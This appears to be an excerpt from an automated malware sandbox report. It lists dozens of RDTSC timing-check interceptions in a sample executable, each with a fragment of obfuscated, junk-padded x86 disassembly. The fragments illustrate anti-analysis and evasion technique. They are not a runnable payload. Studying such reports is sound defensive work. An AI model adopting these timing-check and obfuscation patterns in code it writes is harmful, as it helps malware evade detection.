                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52601C6 second address: 526022C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE311181227h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c jmp 00007FE311181226h 0x00000011 mov esi, dword ptr [ebp+08h] 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 mov ch, dh 0x00000019 pushfd 0x0000001a jmp 00007FE311181226h 0x0000001f add esi, 6B92ECE8h 0x00000025 jmp 00007FE31118121Bh 0x0000002a popfd 0x0000002b popad 0x0000002c rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 526022C second address: 5260244 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE310CDC3A4h 0x00000009 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 5260244 second address: 5260248 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 5260248 second address: 526028D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push esi 0x0000000b jmp 00007FE310CDC3A9h 0x00000010 pop ecx 0x00000011 mov bx, 5054h 0x00000015 popad 0x00000016 mov dword ptr [esp], edi 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FE310CDC3A6h 0x00000020 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 526028D second address: 52602D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, 88B4h 0x00000007 jmp 00007FE31118121Dh 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f test esi, esi 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007FE31118121Ch 0x00000018 xor si, 5668h 0x0000001d jmp 00007FE31118121Bh 0x00000022 popfd 0x00000023 mov eax, 4238145Fh 0x00000028 popad 0x00000029 je 00007FE383CAF560h 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 pushad 0x00000034 popad 0x00000035 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52602D7 second address: 52602EE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE310CDC3A3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52602EE second address: 5260327 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, 1Eh 0x00000005 jmp 00007FE311181220h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d cmp dword ptr [esi+08h], DDEEDDEEh 0x00000014 pushad 0x00000015 mov dx, si 0x00000018 push eax 0x00000019 pushad 0x0000001a popad 0x0000001b pop edi 0x0000001c popad 0x0000001d je 00007FE383CAF52Bh 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 mov dx, 1822h 0x0000002a mov si, dx 0x0000002d popad 0x0000002e rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 5260327 second address: 526032D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 526032D second address: 526035D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE31118121Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov edx, dword ptr [esi+44h] 0x0000000e jmp 00007FE311181220h 0x00000013 or edx, dword ptr [ebp+0Ch] 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 mov cl, dh 0x0000001b popad 0x0000001c rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 526035D second address: 526037F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE310CDC3A2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test edx, 61000000h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 526037F second address: 526039C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE311181229h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 526039C second address: 52603A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52603A2 second address: 5260476 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007FE383CAF4F4h 0x0000000e pushad 0x0000000f pushad 0x00000010 mov ebx, 07FD2E16h 0x00000015 call 00007FE311181227h 0x0000001a pop eax 0x0000001b popad 0x0000001c pushfd 0x0000001d jmp 00007FE311181229h 0x00000022 add esi, 02CEA226h 0x00000028 jmp 00007FE311181221h 0x0000002d popfd 0x0000002e popad 0x0000002f test byte ptr [esi+48h], 00000001h 0x00000033 pushad 0x00000034 push eax 0x00000035 pushfd 0x00000036 jmp 00007FE311181223h 0x0000003b sub eax, 06C5255Eh 0x00000041 jmp 00007FE311181229h 0x00000046 popfd 0x00000047 pop esi 0x00000048 pushfd 0x00000049 jmp 00007FE311181221h 0x0000004e xor eax, 77875396h 0x00000054 jmp 00007FE311181221h 0x00000059 popfd 0x0000005a popad 0x0000005b jne 00007FE383CAF44Eh 0x00000061 push eax 0x00000062 push edx 0x00000063 pushad 0x00000064 movsx edx, cx 0x00000067 popad 0x00000068 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 5280ADD second address: 5280B12 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebp 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b movsx ebx, si 0x0000000e pushfd 0x0000000f jmp 00007FE310CDC3A4h 0x00000014 sub si, 6648h 0x00000019 jmp 00007FE310CDC39Bh 0x0000001e popfd 0x0000001f popad 0x00000020 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 5280B12 second address: 5280B18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 5280B18 second address: 5280B53 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE310CDC39Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007FE310CDC3A9h 0x00000011 xchg eax, ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FE310CDC39Dh 0x00000019 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 5280B53 second address: 5280B65 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop esi 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov ebp, esp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 5280B65 second address: 5280B69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 5280B69 second address: 5280B6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 5280B6D second address: 5280B73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 5280B73 second address: 5280C49 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE311181223h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and esp, FFFFFFF8h 0x0000000c pushad 0x0000000d push esi 0x0000000e call 00007FE31118121Bh 0x00000013 pop ecx 0x00000014 pop edi 0x00000015 mov dh, cl 0x00000017 popad 0x00000018 push ebp 0x00000019 jmp 00007FE31118121Eh 0x0000001e mov dword ptr [esp], ebx 0x00000021 jmp 00007FE311181220h 0x00000026 xchg eax, esi 0x00000027 pushad 0x00000028 pushad 0x00000029 jmp 00007FE31118121Ch 0x0000002e pushad 0x0000002f popad 0x00000030 popad 0x00000031 mov ax, 9F17h 0x00000035 popad 0x00000036 push eax 0x00000037 pushad 0x00000038 pushfd 0x00000039 jmp 00007FE311181223h 0x0000003e adc ax, 141Eh 0x00000043 jmp 00007FE311181229h 0x00000048 popfd 0x00000049 pushfd 0x0000004a jmp 00007FE311181220h 0x0000004f sub esi, 30089A18h 0x00000055 jmp 00007FE31118121Bh 0x0000005a popfd 0x0000005b popad 0x0000005c xchg eax, esi 0x0000005d push eax 0x0000005e push edx 0x0000005f jmp 00007FE311181225h 0x00000064 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 5280C49 second address: 5280C88 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, dx 0x00000006 mov ch, bh 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov esi, dword ptr [ebp+08h] 0x0000000e jmp 00007FE310CDC3A2h 0x00000013 sub ebx, ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 mov ebx, eax 0x0000001a call 00007FE310CDC3A6h 0x0000001f pop eax 0x00000020 popad 0x00000021 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 5280D57 second address: 5280E0B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE311181224h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test byte ptr [77E16968h], 00000002h 0x00000010 jmp 00007FE311181220h 0x00000015 jne 00007FE383C86846h 0x0000001b jmp 00007FE311181220h 0x00000020 mov edx, dword ptr [ebp+0Ch] 0x00000023 pushad 0x00000024 pushfd 0x00000025 jmp 00007FE31118121Eh 0x0000002a adc al, 00000008h 0x0000002d jmp 00007FE31118121Bh 0x00000032 popfd 0x00000033 movzx ecx, dx 0x00000036 popad 0x00000037 push eax 0x00000038 jmp 00007FE311181220h 0x0000003d mov dword ptr [esp], ebx 0x00000040 pushad 0x00000041 movzx eax, bx 0x00000044 push eax 0x00000045 push edx 0x00000046 pushfd 0x00000047 jmp 00007FE311181229h 0x0000004c add ah, FFFFFF86h 0x0000004f jmp 00007FE311181221h 0x00000054 popfd 0x00000055 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 5280E0B second address: 5280E81 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebx 0x00000008 jmp 00007FE310CDC39Ch 0x0000000d push eax 0x0000000e pushad 0x0000000f mov ecx, edx 0x00000011 mov edi, 5F86E440h 0x00000016 popad 0x00000017 xchg eax, ebx 0x00000018 jmp 00007FE310CDC39Fh 0x0000001d push dword ptr [ebp+14h] 0x00000020 jmp 00007FE310CDC3A6h 0x00000025 push dword ptr [ebp+10h] 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b pushfd 0x0000002c jmp 00007FE310CDC39Dh 0x00000031 and ecx, 69A431A6h 0x00000037 jmp 00007FE310CDC3A1h 0x0000003c popfd 0x0000003d mov ch, 98h 0x0000003f popad 0x00000040 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 5280EAE second address: 5280ECC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE311181221h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov si, 4E25h 0x00000011 popad 0x00000012 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52800E5 second address: 52800FA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE310CDC3A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52800FA second address: 528010A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE31118121Ch 0x00000009 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 528010A second address: 528017C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE310CDC39Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007FE310CDC3A6h 0x00000011 push eax 0x00000012 jmp 00007FE310CDC39Bh 0x00000017 xchg eax, ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b push edi 0x0000001c pop ecx 0x0000001d pushfd 0x0000001e jmp 00007FE310CDC3A7h 0x00000023 or cx, 688Eh 0x00000028 jmp 00007FE310CDC3A9h 0x0000002d popfd 0x0000002e popad 0x0000002f rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 528017C second address: 52801D8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FE311181227h 0x00000008 pop esi 0x00000009 pushfd 0x0000000a jmp 00007FE311181229h 0x0000000f sub esi, 3A557E26h 0x00000015 jmp 00007FE311181221h 0x0000001a popfd 0x0000001b popad 0x0000001c pop edx 0x0000001d pop eax 0x0000001e mov ebp, esp 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 push edi 0x00000024 pop eax 0x00000025 mov bx, 09BAh 0x00000029 popad 0x0000002a rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52801D8 second address: 52801DD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 5270D91 second address: 5270DCA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE311181221h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007FE31118121Eh 0x00000010 pop ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 jmp 00007FE31118121Dh 0x00000019 push esi 0x0000001a pop edi 0x0000001b popad 0x0000001c rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52F0A4F second address: 52F0A53 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52F0A53 second address: 52F0A59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52F0A59 second address: 52F0AC2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE310CDC39Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FE310CDC3A1h 0x00000011 or ecx, 25B20B56h 0x00000017 jmp 00007FE310CDC3A1h 0x0000001c popfd 0x0000001d pushfd 0x0000001e jmp 00007FE310CDC3A0h 0x00000023 sub esi, 27D92D78h 0x00000029 jmp 00007FE310CDC39Bh 0x0000002e popfd 0x0000002f popad 0x00000030 xchg eax, ebp 0x00000031 push eax 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 push eax 0x00000036 push edx 0x00000037 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52F0AC2 second address: 52F0AC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52F0AC6 second address: 52F0AE1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE310CDC3A7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52F0AE1 second address: 52F0B0F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE311181229h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FE31118121Dh 0x00000012 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52F0B0F second address: 52F0B2A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE310CDC3A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52F0B2A second address: 52F0B48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE311181229h 0x00000009 popad 0x0000000a rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52E0D29 second address: 52E0D2F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52E0D2F second address: 52E0D33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52E0D33 second address: 52E0D51 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007FE310CDC3A0h 0x00000012 popad 0x00000013 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52E0A2C second address: 52E0A32 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52E0A32 second address: 52E0A6E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE310CDC39Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FE310CDC39Bh 0x0000000f xchg eax, ebp 0x00000010 jmp 00007FE310CDC3A6h 0x00000015 mov ebp, esp 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52E0A6E second address: 52E0A77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov bx, 430Eh 0x00000008 popad 0x00000009 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52F000B second address: 52F0011 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52F0011 second address: 52F0021 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov dl, E5h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52F0021 second address: 52F0026 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52F0026 second address: 52F002E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, cx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52F002E second address: 52F003E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52F003E second address: 52F0042 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52F0042 second address: 52F0048 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52F0048 second address: 52F0065 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE31118121Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov edx, 433800E0h 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52F0065 second address: 52F006B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52F006B second address: 52F006F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52F006F second address: 52F0095 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push dword ptr [ebp+0Ch] 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FE310CDC3A9h 0x00000012 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52F0095 second address: 52F00A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE31118121Ch 0x00000009 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52F00A5 second address: 52F00BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE310CDC39Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push dword ptr [ebp+08h] 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52F00BF second address: 52F00C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52F00C3 second address: 52F00C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52F012A second address: 52F0177 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushfd 0x00000006 jmp 00007FE311181221h 0x0000000b sbb esi, 4A83A616h 0x00000011 jmp 00007FE311181221h 0x00000016 popfd 0x00000017 popad 0x00000018 pop ebp 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007FE311181228h 0x00000022 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52F0177 second address: 52F017D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52C0008 second address: 52C000C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52C000C second address: 52C0012 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52C0012 second address: 52C0021 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE31118121Bh 0x00000009 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52C0021 second address: 52C0047 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE310CDC3A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52C0047 second address: 52C004B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52C004B second address: 52C0051 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52C0051 second address: 52C00B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FE311181220h 0x00000008 pop esi 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jmp 00007FE311181227h 0x00000012 xchg eax, ebp 0x00000013 jmp 00007FE311181226h 0x00000018 mov ebp, esp 0x0000001a jmp 00007FE311181220h 0x0000001f and esp, FFFFFFF0h 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 movsx edi, si 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52C00B4 second address: 52C00B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
